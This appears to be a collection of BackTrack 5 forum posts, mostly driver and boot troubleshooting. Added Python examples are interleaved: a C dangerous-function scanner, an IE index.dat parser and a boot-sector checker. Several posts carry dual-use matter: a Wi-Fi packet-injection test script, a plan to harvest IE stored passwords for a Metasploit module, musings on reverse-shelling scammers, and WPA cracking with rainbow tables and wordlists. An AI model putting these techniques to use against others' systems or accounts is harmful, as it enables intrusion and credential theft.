I think there are better ways; once I read something about a tracer tool that noticed when a user-supplied buffer was allocated on the heap and reported the size of the buffer, etc. I forgot the name of that tool, but I think it has some potential.
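As an added example (not a tool from the post above), here is a small Python triage script for the "find the dangerous functions, then back-trace their arguments" step: it locates calls to a list of functions in C source, extracts each call's arguments even when they contain nested parentheses, ignores mentions inside comments, and notes when the destination is a fixed-size char array declared in the same file, which is the case worth back-tracing first. The function list and the sample source are constructed for the example.

```python
"""Triage C source for calls to functions that are classic memory-safety
hot spots and note whether the destination is a fixed-size char array
declared in the same file.  Added example for the 'grep for dangerous
functions, then back-trace the arguments' workflow; not a tool from the
original post.  The sample source below is constructed."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Functions worth back-tracing, with the reason each is on the list.
DANGEROUS: Dict[str, str] = {
    "strcpy": "unbounded copy into destination",
    "strcat": "unbounded append to destination",
    "sprintf": "unbounded formatted write",
    "gets": "unbounded read from stdin",
    "memcpy": "check where the length argument comes from",
    "system": "check where the command string comes from",
    "execl": "check where every argument comes from",
}

ARRAY_DECL = re.compile(r"\bchar\s+(\w+)\s*\[\s*(\d+)\s*\]")
CALL = re.compile(r"\b(" + "|".join(map(re.escape, DANGEROUS)) + r")\s*\(")


@dataclass
class Finding:
    line: int
    func: str
    args: List[str]
    dest_size: Optional[int]  # literal size of the first argument's array, if declared
    reason: str


def _blank_comments(src: str) -> str:
    """Overwrite comment bodies with spaces, keeping newlines so line numbers survive."""
    def keep_newlines(m):
        return "".join("\n" if c == "\n" else " " for c in m.group(0))
    src = re.sub(r"/\*.*?\*/", keep_newlines, src, flags=re.S)
    return re.sub(r"//[^\n]*", keep_newlines, src)


def _call_args(src: str, open_paren: int) -> Optional[str]:
    """Return the text between the '(' at open_paren and its matching ')'."""
    depth = 0
    for i in range(open_paren, len(src)):
        if src[i] == "(":
            depth += 1
        elif src[i] == ")":
            depth -= 1
            if depth == 0:
                return src[open_paren + 1:i]
    return None  # unbalanced: truncated or macro-mangled source


def split_top_level(args: str) -> List[str]:
    """Split an argument list on commas that are not nested in parentheses."""
    parts, depth, cur = [], 0, []
    for c in args:
        if c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
        if c == "," and depth == 0:
            parts.append("".join(cur).strip())
            cur = []
        else:
            cur.append(c)
    if cur:
        parts.append("".join(cur).strip())
    return parts


def scan_source(src: str) -> List[Finding]:
    """Return every call to a DANGEROUS function, in source order."""
    src = _blank_comments(src)
    # Coarse: one file-wide name -> size map, so shadowed names collide.
    sizes = {name: int(n) for name, n in ARRAY_DECL.findall(src)}
    findings: List[Finding] = []
    for m in CALL.finditer(src):
        raw = _call_args(src, m.end() - 1)
        if raw is None:
            continue
        args = split_top_level(raw)
        findings.append(Finding(
            line=src.count("\n", 0, m.start()) + 1,
            func=m.group(1),
            args=args,
            dest_size=sizes.get(args[0]) if args else None,
            reason=DANGEROUS[m.group(1)],
        ))
    return findings


# Constructed sample: one unbounded copy, one length-controlled memcpy, one
# bounded snprintf that must not be reported, and a mention inside a comment.
SAMPLE_C = r"""
#include <string.h>
#include <stdio.h>
/* strcpy mentioned here must not be reported */
static char greeting[32];
void handle(const char *name, const void *data, size_t len) {
    char buf[64];
    strcpy(buf, name);                       /* name comes off the wire */
    memcpy(greeting, data, len);             // len is attacker-controlled too
    snprintf(buf, sizeof(buf), "%s", name);  // bounded, not on the list
}
"""

if __name__ == "__main__":
    for f in scan_source(SAMPLE_C):
        size = f"dest={f.args[0]}[{f.dest_size}]" if f.dest_size else ""
        print(f"line {f.line}: {f.func}({', '.join(f.args)}) {size} -- {f.reason}")
```

The size map is file-wide, so two functions that both declare a `buf` get the same size; treat the output as a worklist for the manual back-trace, not as a verdict.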

So, you may freak out here and say OH MY! THIS IS NOT A BUG IN BT, IT'S A BUG IN VMWARE!! But before you read further, I'm just going to state that this adapter (Alfa AWUS036NH) works perfectly when booting from a hard drive, and I believe this to be something that can be fixed rather easily to the benefit of many people.

When booting BackTrack 5 through VMware Fusion (it also happens in VMware Workstation), the adapter in question will fail to start up properly when you modprobe the driver. It'll go into monitor mode, but it fails to successfully sniff traffic most of the time when you try airodump-ng or something like that. I've searched and searched for an answer to this, because it's frustrating to know that it works so well booting from a USB stick or hard drive, but that for some reason it hardly works from VMware.

I have a little shell script I wrote just to reset the device and test for injection on channel 11:

Code:
#!/bin/bash
# Unload the Ralink USB driver and the stack it depends on (leaf modules first)
modprobe -r rt2800usb rt2x00usb rt2800lib rt2x00lib crc_ccitt mac80211 cfg80211
# Reload the driver; modprobe pulls the dependencies back in
modprobe rt2800usb
# Kill interfering processes, then put wlan0 in monitor mode on channel 11 (creates mon0)
airmon-ng check kill && airmon-ng start wlan0 11
# Injection test on the monitor interface
aireplay-ng -9 mon0
I have to run this script anywhere from 1 to 10 times to get injection working properly. Again, I'm not really sure if this thread belongs in this section, but honestly I'm not sure where else it would go... Considering the only reasonably helpful thread I've found on the subject has 7k+ views and no solution, I would imagine that a lot of people (myself included) would appreciate a fix, if it's at all possible.

Last week or so I got some free time and decided to start playing around with extracting browsing history from index.dat files. I know there are a million and one tools out there to do this; I just wanted to figure it out myself without using Windows APIs. I eventually want to incorporate it into a Metasploit post module that grabs all kinds of good info from IE, so I kind of had an ulterior motive for trying to parse out the file. Anyway, I came up with a Ruby script that parses out the URL, date accessed, and date modified. It will work on the index.dat files from the Cookies, History, and Temporary Internet Files folders. It's not a post module yet, but probably soon. I just need to invest some time into using this history list to hash and compare to the encrypted URLs for the auto-complete passwords stored in the registry. Another script for another day.

I had a hard time finding good information on how to parse this data, so I also wrote a short blog post that talks about the structure of the index.dat file and how I parsed out the data, in case anyone's interested. Here's the blog post: Parsing IE's Index.dat
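As an added example (this is not the Ruby script the post describes, and the record offsets are the version 5.2 layout as I recall it from the libmsiecf documentation, so treat them as an assumption to verify against a real file), here is a Python parser that walks an index.dat block by block, decodes each URL record's URL and its two FILETIMEs, and converts them to UTC datetimes. The sample file is constructed with the same layout.

```python
"""Scan an MSIE 5.x index.dat for URL records and pull out the URL plus the
modified/accessed FILETIMEs.  Added example, not the Ruby script from the
post.  Record offsets (signature at 0x00, block count at 0x04, modified
FILETIME at 0x08, accessed FILETIME at 0x10, URL offset at 0x34) are the
version 5.2 layout as I remember it from the libmsiecf documentation and
should be verified against a real file; the sample below is constructed
with that same layout."""
import struct
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import List, Optional

BLOCK = 128                              # records are allocated in 128-byte blocks
HEADER_SIG = b"Client UrlCache MMF Ver "
URL_SIG = b"URL "
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


@dataclass
class Entry:
    offset: int            # file offset of the record
    url: str
    modified: Optional[datetime]
    accessed: Optional[datetime]


def filetime_to_datetime(ft: int) -> Optional[datetime]:
    """FILETIME is 100 ns ticks since 1601-01-01 UTC; zero means 'not set'."""
    if ft == 0:
        return None
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def parse_index_dat(data: bytes) -> List[Entry]:
    """Walk the file block by block and decode every URL record.

    Scanning on block boundaries instead of following the hash table also
    picks up records the hash table no longer points to."""
    if not data.startswith(HEADER_SIG):
        raise ValueError("missing 'Client UrlCache MMF' header")
    entries: List[Entry] = []
    off = 0
    while off + BLOCK <= len(data):
        if data[off:off + 4] != URL_SIG:
            off += BLOCK
            continue
        blocks = struct.unpack_from("<I", data, off + 4)[0]
        if blocks == 0 or off + blocks * BLOCK > len(data):
            off += BLOCK            # truncated or corrupt record; keep scanning
            continue
        rec = data[off:off + blocks * BLOCK]
        modified, accessed = struct.unpack_from("<QQ", rec, 0x08)
        url_off = struct.unpack_from("<I", rec, 0x34)[0]
        if 0 < url_off < len(rec):
            end = rec.find(b"\x00", url_off)
            url = rec[url_off:end if end != -1 else len(rec)].decode("latin-1")
            entries.append(Entry(off, url, filetime_to_datetime(modified),
                                 filetime_to_datetime(accessed)))
        off += blocks * BLOCK
    return entries


# --- constructed sample file -------------------------------------------------
UNIX_EPOCH_FILETIME = 116444736000000000          # 1970-01-01 00:00:00 UTC as FILETIME


def unix_to_filetime(unix_seconds: int) -> int:
    return UNIX_EPOCH_FILETIME + unix_seconds * 10_000_000


def _url_record(url: bytes, modified: int, accessed: int) -> bytes:
    url_off = 0x68                      # assumed fixed record header size for the sample
    blocks = (url_off + len(url) + 1 + BLOCK - 1) // BLOCK
    rec = bytearray(blocks * BLOCK)
    rec[0:4] = URL_SIG
    struct.pack_into("<I", rec, 0x04, blocks)
    struct.pack_into("<QQ", rec, 0x08, modified, accessed)
    struct.pack_into("<I", rec, 0x34, url_off)
    rec[url_off:url_off + len(url)] = url
    return bytes(rec)


def build_sample() -> bytes:
    # Header plus padding; a real file carries a hash table in this region.
    header = (HEADER_SIG + b"5.2\x00").ljust(BLOCK * 2, b"\x00")
    t = unix_to_filetime(1306886400)     # 2011-06-01 00:00:00 UTC
    return (header
            + _url_record(b"Visited: alice@http://example.test/login", t, t + 3600 * 10_000_000)
            + bytes(BLOCK)               # an unused block between records
            + _url_record(b"http://example.test/img.png", 0, t))


if __name__ == "__main__":
    for e in parse_index_dat(build_sample()):
        print(f"0x{e.offset:06x} {e.url}  modified={e.modified}  accessed={e.accessed}")
```

History records carry the "Visited: user@" prefix shown in the sample; cookie and cache records carry the bare URL or a "Cookie:" prefix, so strip the prefix only after you have matched on it.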

I have a MacBook Pro 5,5 and seem to have a problem obtaining an IP while trying to connect to my network, which is DD-WRT with WPA2 TKIP. Having read that TKIP can cause some connectivity issues, I changed it to WPA2 PSK and was able to connect - but it's very flaky and requires several reconnect attempts or even a reboot...

I have a Broadcom BCM4322 with the b43 driver. Previously I had Ubuntu installed and used the Broadcom STA driver, which worked fine, so I'm guessing I should be using that instead.

Trying to use Jockey didn't work. It ended up removing the old driver while failing to install the STA driver. Some googling around revealed that it was caused by Synaptic still running. I made sure Synaptic was not running and the problem stayed the same.

Then trying to install it manually from Broadcom didn't go anywhere either. They had a patch for the driver, but it was for 2.6.37 and they didn't guarantee it would work on newer versions, which for me it didn't.

So I decided to just stick to b43.

Today I ran apt-get upgrade and saw that there was something coming through for Broadcom - but it ended up giving an error message:

Quote:
Deleting module version: 5.60.48.36+bdcom
completely from the DKMS tree.
------------------------------
Done.
Loading new bcmwl-5.60.48.36+bdcom DKMS files...
First Installation: checking all kernels...
Building only for 2.6.38
Building for architecture i686
Building initial module for 2.6.38

WARNING: Symbol version dump /usr/src/linux-source-2.6.38/Module.symvers
is missing; modules will have no dependencies and modversions.

LD /var/lib/dkms/bcmwl/5.60.48.36+bdcom/build/built-in.o
CC [M] /var/lib/dkms/bcmwl/5.60.48.36+bdcom/build/src/shared/linux_osl.o
CC [M] /var/lib/dkms/bcmwl/5.60.48.36+bdcom/build/src/wl/sys/wl_linux.o
/var/lib/dkms/bcmwl/5.60.48.36+bdcom/build/src/wl/sys/wl_linux.c: In function ‘_wl_set_multicast_list’:
/var/lib/dkms/bcmwl/5.60.48.36+bdcom/build/src/wl/sys/wl_linux.c:1435: error: ‘struct net_device’ has no member named ‘mc_list’
/var/lib/dkms/bcmwl/5.60.48.36+bdcom/build/src/wl/sys/wl_linux.c:1435: error: ‘struct net_device’ has no member named ‘mc_count’
/var/lib/dkms/bcmwl/5.60.48.36+bdcom/build/src/wl/sys/wl_linux.c:1436: error: dereferencing pointer to incomplete type
/var/lib/dkms/bcmwl/5.60.48.36+bdcom/build/src/wl/sys/wl_linux.c:1442: error: dereferencing pointer to incomplete type
make[1]: *** [/var/lib/dkms/bcmwl/5.60.48.36+bdcom/build/src/wl/sys/wl_linux.o] Error 1
make: *** [_module_/var/lib/dkms/bcmwl/5.60.48.36+bdcom/build] Error 2
make: Leaving directory `/usr/src/linux-source-2.6.38'
It seems that the "new" version coming in the upgrade is the same as the old one already installed, "5.60.48.36", and it says that it removed the one installed but failed to install the new one; yet wireless is working (not well, but it connects, eventually)...

Also, my Ubuntu installation was i386 and BT5 is i686, which is for Pentium?

Can anybody shed some light on this issue?

Thank you.

P.S. Another thing is that all networks discovered show 100% strength, which obviously isn't correct either.

I have found many threads about this problem with many different solutions, none of which worked for me.
I could not install VB without errors. I won't list everything I tried; just check out the forums, I tried them all. The following is my log output. The last entry was after I ran the commands listed below.
I am running BT5 32-bit.
Code:
# uname -a
Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
I have never had this issue until now with VB. I downloaded from the repos and the VBox site... nothing worked until I used this link on the VBox site: http://www.virtualbox.org/wiki/Linux_Downloads then go to the very last link "All distributions". It is a .run file.

After downloading:

#cd file.location
#chmod +x file.name.run

chmod it even if you are root.

#sh file.name.run
or
#./file.name.run

I used:
#./file.name.run

That's it. No missing kernel module errors, no dependency errors, no errors at all. VBox is working as I write this.

I've seen several people raising this issue, but so far none of the suggested solutions have resolved it for me, so I'm opening this thread in the hope of getting it resolved. Any help would be much appreciated.

Sqlmap on BT5 produced an error, so I removed it, deleted the sqlmap folder and reinstalled it. Whenever I run an update, via either svn up or the excellent script by sickness (0.6), it starts to update and then produces the following error:

If I then try to run sqlmap.py I get the following error, which I can only clear if I remove and reinstall (and don't attempt to update it):
Traceback (most recent call last):
File "./sqlmap.py", line 27, in <module>
from lib.controller.controller import start
File "/pentest/database/sqlmap/lib/controller/controller.py", line 13, in <module>
from lib.controller.action import action
File "/pentest/database/sqlmap/lib/controller/action.py", line 10, in <module>
from lib.controller.handler import setHandler
File "/pentest/database/sqlmap/lib/controller/handler.py", line 27, in <module>
from plugins.dbms.mssqlserver import MSSQLServerMap
File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/__init__.py", line 14, in <module>
from plugins.dbms.mssqlserver.enumeration import Enumeration
File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/enumeration.py", line 28, in <module>
from plugins.generic.enumeration import Enumeration as GenericEnumeration
File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 34, in <module>
from lib.core.common import singleTimeWarnMessage
ImportError: cannot import name singleTimeWarnMessage

Again, any help would be appreciated and sorry if this is 'yet another thread' but I can't find a solution so far.

This is the AMD64 KDE version; I have checked the md5 hash and they are the same.
While attempting to boot the live CD in plain text or safe mode I always get this line of text repeatedly: "/init: line 3: can't open /dev/sdb: no medium found",
cycling through /dev/sdb, /dev/sdc, /dev/sdd, /dev/sde.
After about 30 seconds I get this message:
"BusyBox v1.13.3 (Ubuntu 1:1.13.3-1ubuntu11) built-in shell (ash)
Enter 'help' for a list of built-in commands."

I am running Windows 7 64-bit, so that's not the issue.
Both .iso files were checked to verify that their md5sums were correct, and sure enough they weren't corrupted.
Here is what is happening:
I am using a 16 GB USB stick to try to get this working (FAT32), and have used 4 different tools to try to accomplish this (5 with LiLi, but that's not what I'm looking for) (they do produce slightly different results):
live-usb-install 2.2.9
universal-usb-installer 1.8.5.7
unetbootin ?
FUSBi 0.3.1

Basically it gives me the option of what mode I want to boot in, then I select (default, text, etc.).
After I select something it starts loading normally. Then I get to the splash screen just before the Chinese characters (I haven't given it any input yet).
I sit there waiting for 5 minutes, with nothing happening. Every time. The Esc button or arrow keys will immediately make it swap to a text-based thing where it asks me to name the drive (or something very similar; the example is debian5.0.2 drive (definitely something to do with Debian 5.0.2)). I'm pretty sure that's not what I'm looking for. Do you reckon I should just give it longer to load?
Any comments would be highly appreciated

I usually don't post much, but for curiosity's sake I was wondering what ways could be used to gather information in the situation below.

Explanation:
I got a call from "Windows Tech Support", which I obviously know is a scam where they get you to download some "remote control" software which gives them access to your computer; at that point they lock your keyboard and mouse and ask for money, or they start deleting files. I played with them for a bit socially on the phone to see exactly what they were trying to do, and afterwards phoned local law enforcement to let them know what is happening. They knew what was happening and said these people use pre-paid phones and are not possible to track.

This got me thinking, because since they get you to install remote software onto your machine and they make the secure connection, you should be able to netstat to find out their IP (or could they be doing that through Tor, etc.?). Next I was thinking: is it possible to set up a reverse shell on them? When they connect to your machine (dummy virtual PC) with the remote software, what could you do?

Now I know I am not skilled enough to perform something like this, but I am interested in whether it's possible.

I have an Acer TravelMate 5542G notebook and want to install BackTrack 5. When I boot from the BT5 DVD this text appears:
"ISOLINUX 3.63 Debian-2008-07-15 Copyright (C) 1994-2004 H. Peter Anvin
boot:"
I press Enter and then I choose "BackTrack Text - Default Boot Text Mode".
Then a lot of text comes, and a window with text and the BT logo, and then the display is black :(

When I choose "Backtrack Debug - Safe Mode" the text stops after a little while and the following text is there: "Fixing recursive fault but reboot is needed!" or "panic occurred, switching back to text console"
What information do you need and what can I give you? And where do I get it from?

I am trying to hook up my Belkin F5D7050 Wi-Fi USB card to BT5. I have read that people have had success on BT4 installing this Wi-Fi USB adapter. It seems that most lists exclude Belkin even though it may be possible to install this version of Wi-Fi card. I have tried the usual steps and cannot get it installed. Can anyone help?

Recently I burned BackTrack 32-bit GNOME to a live CD, and when I insert the CD, restart my laptop and let everything load, I just get a black screen a while after the startup mode selection. I even tried the 64-bit version and it also didn't work. I tried the live CD on my sister's laptop and it worked perfectly without any issues.

Ok guys, it took me a while to figure this out, so I am posting it here to help out anyone in the future who runs into this problem.

The setup here is that I wanted to use PGP Whole Disk Encryption on Win7 (64-bit) along with BT5 (64-bit) KDE on the same laptop and dual boot. So here are the steps I used to make this work.

1. Install Windows 7 as you normally would.
2. Install BT5 from LiveCD/unetbootin (see the BT wiki for build instructions) and use the "run side by side" option, but put the GRUB boot loader on the extended or root partition.
- Basically anywhere other than the Windows boot loader or the MBR
- I put mine on /dev/sdb2, which is the front of the extended partition.

Keep in mind that in order for this to work, when installing BackTrack you should
have installed grub2 on your root (/) partition and not the MBR or the Windows partition.
(When you install BackTrack, at the very end before install, click the Advanced button and pick your root (/) partition, or in my case /dev/sdb2.)

Boot into BackTrack using the live CD or the USB boot drive, just like
you did for installation. DO NOT BOOT FROM THE HARD DISK.

Open a terminal window and type:

fdisk -l

This will list all of your existing partitions. Look for the partition
that you installed the BackTrack loader on. The list should look something like this:

Once you find your boot partition, use the following command to extract the first 512 bytes to a bin file:

dd if=/dev/sdb2 of=grub.bin bs=512 count=1

This creates a grub.bin file in the current directory you ran the command in (probably root's home).

Copy this bin file to a USB stick or over to the Windows partition if you still have access. You will need this file for booting later.

Hint: while you're here, go ahead and grab the first 512 bytes of each sdb partition, so if you need to later you can just copy and paste them to
replace your grub.ini in case the boot fails or you get a blinking cursor.

This way you don't have to keep booting back into the live CD to get them, and you can just rename them from grubx.ini to grub.ini after testing to see if your boot works.

Ok, after you have your grub.ini files, reboot back into Windows 7.

Now we need to edit the boot loader for Windows 7. Granted, there are better ways to do this, such as using EasyBCD, but they don't
have the specific abilities (file path designation) to do what we need.

Perform the following in Win7 to map the Windows boot partition:

Right click "Computer" from the start menu and go to "Manage".
Click "Disk Management".
Right click the "System Reserved" partition (about 100 MB) and
click "Change Drive Letter and Paths".
Assign it the default letter if you want and click OK.
Mine was letter E:, but yours may vary depending on how many drives
you have connected to your box.

Note: you may have to unhide your files/folders in Folder Options. I do this by default, so I am not sure if it is required.

Now we need to edit the boot loader:

Go to Start > Programs > Accessories > (right click) Command Prompt and
choose Run as administrator.

From the command line run:

bcdedit -store f:\boot\bcd -create /d "GRUB" /application BOOTSECTOR

You will get a message with a description ID inside {}:

The entry {3a786276-a9b5-11e0-9a8f-5c260a61386f} was successfully created.
Make note of this ID; we will need it.

Hint: You can rename "GRUB" to "Linux", "BT" or whatever text you want to see on boot.

Now let's add the grub file to the boot record:
Copy your grub.ini file to the C:\ drive, and perform the following:
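The post is cut off above. As an added check for its dd step (example code, not part of the original post), here is a Python inspection of the 512-byte file before it is copied over to Windows: it confirms the size, the 0x55AA boot signature and a leading jump instruction, and warns when the sector carries a partition table, which means dd was pointed at the whole disk rather than the partition. The checks are heuristics, and the assumption that GRUB 2's boot.img contains the string "GRUB" is mine; the sample sectors are constructed.

```python
"""Sanity-check the 512-byte file produced by
'dd if=/dev/sdXN of=grub.bin bs=512 count=1' before copying it to Windows.
Added example, not part of the original post.  The checks are heuristics:
the 0x55AA signature and the leading jump are what any x86 boot sector has,
a partition-table scan tells a whole-disk MBR apart from a partition boot
sector, and 'GRUB' appearing in the sector is an assumption about what
GRUB 2's boot.img contains.  The sample sectors are constructed."""
import struct
from dataclasses import dataclass
from typing import List

SECTOR = 512
PART_TABLE = 0x1BE                 # four 16-byte entries, only meaningful in an MBR
BOOT_SIG = b"\x55\xAA"


@dataclass
class SectorReport:
    size_ok: bool
    signature_ok: bool
    starts_with_jump: bool
    mentions_grub: bool
    looks_like_mbr: bool
    problems: List[str]


def _has_partition_table(sector: bytes) -> bool:
    """True if at least one MBR partition entry is in use and none is garbage."""
    used = 0
    for i in range(4):
        status = sector[PART_TABLE + 16 * i]
        ptype = sector[PART_TABLE + 16 * i + 4]
        if status not in (0x00, 0x80):
            return False               # not a partition table at all
        if ptype != 0:
            used += 1
    return used > 0


def inspect_sector(sector: bytes) -> SectorReport:
    problems: List[str] = []
    size_ok = len(sector) == SECTOR
    if not size_ok:
        problems.append(f"expected {SECTOR} bytes, got {len(sector)} (wrong bs/count?)")
    signature_ok = size_ok and sector[510:512] == BOOT_SIG
    if size_ok and not signature_ok:
        problems.append("no 0x55AA boot signature: not a boot sector, maybe the wrong partition")
    starts_with_jump = size_ok and sector[0] in (0xEB, 0xE9)
    if size_ok and not starts_with_jump:
        problems.append("does not start with a jump: no boot code, GRUB may not be installed here")
    mentions_grub = b"GRUB" in sector
    looks_like_mbr = size_ok and _has_partition_table(sector)
    if looks_like_mbr:
        problems.append("contains a partition table: this is the whole-disk MBR, "
                        "dd from the partition (e.g. sdb2), not the disk (sdb)")
    return SectorReport(size_ok, signature_ok, starts_with_jump,
                        mentions_grub, looks_like_mbr, problems)


# --- constructed samples -------------------------------------------------------
def _sector_with(code: bytes, entries: bytes = b"") -> bytes:
    s = bytearray(SECTOR)
    s[0:len(code)] = code
    s[PART_TABLE:PART_TABLE + len(entries)] = entries
    s[510:512] = BOOT_SIG
    return bytes(s)


# What a GRUB boot.img-style partition boot sector looks like to these checks.
GRUB_PARTITION_SECTOR = _sector_with(b"\xEB\x63\x90" + b"GRUB \x00")
# A whole-disk MBR: boot code plus one active Linux (type 0x83) partition entry.
DISK_MBR = _sector_with(b"\xEB\x63\x90",
                        struct.pack("<B3sB3sII", 0x80, b"\x01\x01\x00", 0x83,
                                    b"\xFE\xFF\xFF", 2048, 409600))
# The first sector of a plain data partition: no boot code, no signature.
DATA_SECTOR = bytes(SECTOR)

if __name__ == "__main__":
    for name, sec in (("grub.bin", GRUB_PARTITION_SECTOR),
                      ("mbr.bin", DISK_MBR), ("data.bin", DATA_SECTOR)):
        r = inspect_sector(sec)
        print(name, "OK" if not r.problems else "; ".join(r.problems))
```

Run it as `python3 check_sector.py` after adding `inspect_sector(open("grub.bin", "rb").read())` for the real file; an empty problems list is the signal that the file is worth copying to C:\.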

As the title states, ettercap has disappeared on me. I don't know if I installed a package that stripped it away or what's going on, but when I tried to download it from the repos again I get a 404 error

Code:
# apt-get install ettercap
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following extra packages will be installed:
ettercap-common
The following NEW packages will be installed:
ettercap ettercap-common
0 upgraded, 2 newly installed, 0 to remove and 4 not upgraded.
Need to get 517kB of archives.
After this operation, 1,716kB of additional disk space will be used.
Do you want to continue [Y/n]? y
Err http://32.repository.backtrack-linux.org/ revolution/main ettercap-common 1:0.7.3-1.4ubuntu1
404 Not Found
Err http://32.repository.backtrack-linux.org/ revolution/main ettercap 1:0.7.3-1.4ubuntu1
404 Not Found
Failed to fetch http://32.repository.backtrack-linux.org/pool/main/e/ettercap/ettercap-common_0.7.3-1.4ubuntu1_i386.deb 404 Not Found
Failed to fetch http://32.repository.backtrack-linux.org/pool/main/e/ettercap/ettercap_0.7.3-1.4ubuntu1_i386.deb 404 Not Found
E: Unable to fetch some archives, maybe run apt-get update or try with --fix-missing?
I did run apt-get update and then tried apt-get install ettercap --fix-missing and still got the 404 error.

I noticed this same problem has been occurring with other people in the update-script thread, but I've personally never used that script.

Does this have anything to do with the latest version of ettercap being released?

I don't know whether this is a common problem with Windows 7, but for some reason when I open my dictionary .txt document it hangs in Windows 7. I don't have problems opening them in XP 32 or 64, but when I try to open my wordlist in 7, no matter what size the .txt file is (500 MB or 2 GB) it hangs for a long extended period of time. Is there any way to resolve this problem in Windows 7? Because this does not happen in XP.

Here is a screenshot of me opening my wordlist

As you can see from my screenshot it says (not responding); keep in mind that this is only a 300 MB wordlist, and it took 24 minutes for it to open. I tried opening it in Notepad as well as Notepad2 and a few other text-opening programs and I still get the same outcome.

I've also noticed that it takes a tremendous amount of system resources to open one .txt file even when I end many of the processes that are open on my computer. I would have 50 processes running, which is not a lot considering I have 8 GB of RAM, and still it hangs.

I have not even opened up one of my large multi-GB wordlists because it hangs forever. Does anyone have any solutions to opening wordlist .txt docs in Windows 7 without the long hang time?

The problem is when connecting to the router with BT5 using the wireless antenna model AWUS036NH. It tries to get past validating authentication in WICD but then gives a 'bad password' error when the password is right, and Windows can connect to the wireless fine with the same credentials.

A number of 'fixes' have been tried from going through the forum; however, none have resolved the issue.

BackTrack VM Version 5

Tried in ISO

BT5 gnome 32 bit VMPlayer

BT5 gnome 32 bit VMWare Workstation

Tried in ISO within Oracle Virtual Box

BackTrack 5 compatible wireless adapter - AWUS036NH

Has anyone experienced this before and can offer any tips/suggestions?

Ok, so after downloading the BackTrack 5 KDE 32-bit version I burned it to a DVD and ran it as a LiveCD. It worked perfectly, connected using WICD perfectly. Then I installed it to my HD to run a dual boot Win7/BT5. After doing this I got the "cannot connect to d-bus" error, which I fixed, and it connected again perfectly. I installed some drivers for my system (ATI Catalyst drivers) and a couple of other small things that should not affect the system much. Well, I had restarted my computer a few times through all of these processes and everything connected, so I assumed everything was alright. I shut down for the night using "Shutdown -P 1" and went to bed. I woke up the next morning and started the system up again and came across the "Bad Password" issue. After spending the rest of last week reading "fixes" to this issue and reinstalling BackTrack about 3 times... nothing worked. I removed network-manager, I reconfigured WICD, etc. There were about 7 different "fixes" to this issue that I've tried. Finally I came across an article that basically instructed me to force-downgrade WICD to version 1.6.1 instead of 1.7. After doing this I got past the authentication issues and no longer received the Bad Password error. Now instead I get "Unable to get IP Address" after WICD takes about 5 minutes to get past validation and into the obtaining IP address phase. I am about to test and see if GNOME gives me the same problem (I'm kind of new to Linux, so really this is just a guess).

Does anyone have any idea what is causing this issue? The current wireless card that I am using is a D-Link DWA-552, the AP is a D-Link DIR-655 Xtreme-N router.

Quote:
[-] Exploit exception: RCPT: 550-dsl181157.$$$$$$$$$$.net (zbwQXWNO.com) [MY IP ADDRESS ] is currently not
550-permitted to relay through this server. Perhaps you have not logged into
550-the pop/imap server in the last 30 minutes or do not have SMTP
550 Authentication turned on in your email client.[*] Exploit completed, but no session was created.
Any idea how to fix this?

Hi, I've got a problem with loading those rainbow tables (wpa_psk-h1kari_renderman) in Gerix cracker; I've got a 33 GB folder with files. Can someone give me a full guide on how to load those files in Gerix cracker?

I am using BT5 GNOME 64 with an Alfa AWUS036NH USB adapter and my internet speed is horrible. I am getting around 0.2 Mbps when running a speed test at speedtest.net. On Windows I am able to get at least 6 Mbps. I am connected through WPA. Any help on this is greatly appreciated.

Ok, here's my problem. My goal is to dual boot my Windows 7 with BackTrack 5 KDE 32/64 using the provided installer. So far, none have been working correctly, so I haven't even begun trying the installer.
Here's what I've tried: BT5 GNOME/KDE 32/64 with UNetbootin and LiveLinux USB Creator, run both as administrator and with regular permissions. I've tried every iteration of all those. Twice. Yes, I've done this at least sixteen times. It's a little frustrating, especially because on other computers I've used they work fine. The closest I've come was when I used BT5 GNOME x64 with LiveLinux USB, and UNetbootin with BT5 KDE x86; both eventually got me to the startx desktop, though KDE had a black screen that I typed "startx" into on instinct. Even when I'm on the desktop, no tools work, most notably Gerix Wifi Cracker, which is the one I need the most. It just doesn't run. Although in GNOME, it shows when I log out as an unknown process. Why is this happening to me?! Someone please help me! I posted all the info I think you need, checked all the solutions I could, but if I left something out please tell me. As of now, it's a USB boot, so all the things are default. Please help. Thanks.

I was searching over the internet for a resolution to my problem with BT5 and did not succeed in resolving it.
So I will try here to find a solution with your help :)

Anyway, I just installed BackTrack 5 x64 KDE, and after install I removed cache files and installed drivers (from the nVidia website); now when I try to start X I get the first screen with KDE loading, and after that it crashes and reports an error.
Here is my xorg.conf: http://pastebin.com/2FZ4Jrt7
and the X log: http://pastebin.com/D7uH9F0y

I think that's all you need for troubleshooting; if I missed something, please request it.

Thanks for looking at this and helping. I'm a beginner with BackTrack. I'm having an issue with starting BackTrack 5 from a live USB. I'm using the x64 GNOME distro. Whenever I try to use startx, I get the message "startx: not found". I've looked, but I cannot find anyone who had the same problem as me. Is there any way to fix this? I've tried booting into safe mode, text mode, and default mode, but startx does not work with them either.

Hi everybody,
I have a problem with my PC when installing BT5: after writing "startx" my PC reboots, the screen is black and there is a message on the monitor: "no card supported".
My graphics card is an ATI Radeon HD 5870 and my CPU is an i7 980X.

I've been looking for the last 2 days on the BT forums at fixes and bugs and my head is going to explode :(
I loved BT4 and was really looking forward to BT5, but the problem is I can't even start it. I have downloaded BT5 KDE64 and KDE32 and GNOME64 and 32; none of them work for me. When I startx, the window kicks me back to startx again. I tried the fix http://www.backtrack-linux.org/forum...x-problem.html but it is not a permanent fix. I tried it on VMware and the live CD, same problem!
Can anyone please help me out to get my BT5 running? As you can see I am new to BackTrack and very keen to learn.

Did some Google searching; I found a final fix for Ettercap and resolved the crashing/freezing problem.
1) Uninstall the existing version of Ettercap on BT5 using the package manager.
2) download these packages:

I'm really new to this. Yesterday I installed VLC from the repos (at least I think it installed properly); I can't seem to find how to run it without a command though, but anyway, I type "vlc" to try and run it and get the following:

Couldn't find how to screenshot as I have BT5 installed on the HD, not in VMware
